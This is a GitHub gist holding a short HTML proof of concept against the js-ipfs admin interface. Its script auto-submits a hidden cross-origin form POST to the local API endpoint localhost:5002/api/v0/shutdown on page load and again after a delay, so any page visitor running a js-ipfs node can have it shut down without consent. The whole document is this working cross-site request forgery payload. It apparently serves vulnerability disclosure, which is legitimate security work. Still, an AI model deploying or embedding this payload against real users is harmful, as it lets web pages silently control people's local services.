Skip to content

Instantly share code, notes, and snippets.

@tintinweb
Last active May 5, 2021 22:43
Show Gist options
  • Save tintinweb/7520115105b938786251e6a072cc1877 to your computer and use it in GitHub Desktop.
Save tintinweb/7520115105b938786251e6a072cc1877 to your computer and use it in GitHub Desktop.
poc for jsipfs admin interface arbitrary write
<!doctype html>
<html>
<body>
<script>
function callBypassingCORS(target){
let elem = document.createElement("form");
elem.setAttribute("method", "post");
elem.setAttribute("action", target);
elem.setAttribute("target", "__dummy__")
document.body.appendChild(elem);
elem.submit();
}
window.onload = function(){
callBypassingCORS("http://localhost:5002/api/v0/shutdown"); //bye
}
setTimeout(function(){callBypassingCORS("http://localhost:5002/api/v0/shutdown"); }, 1000); //make it work for gistpreview :D
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment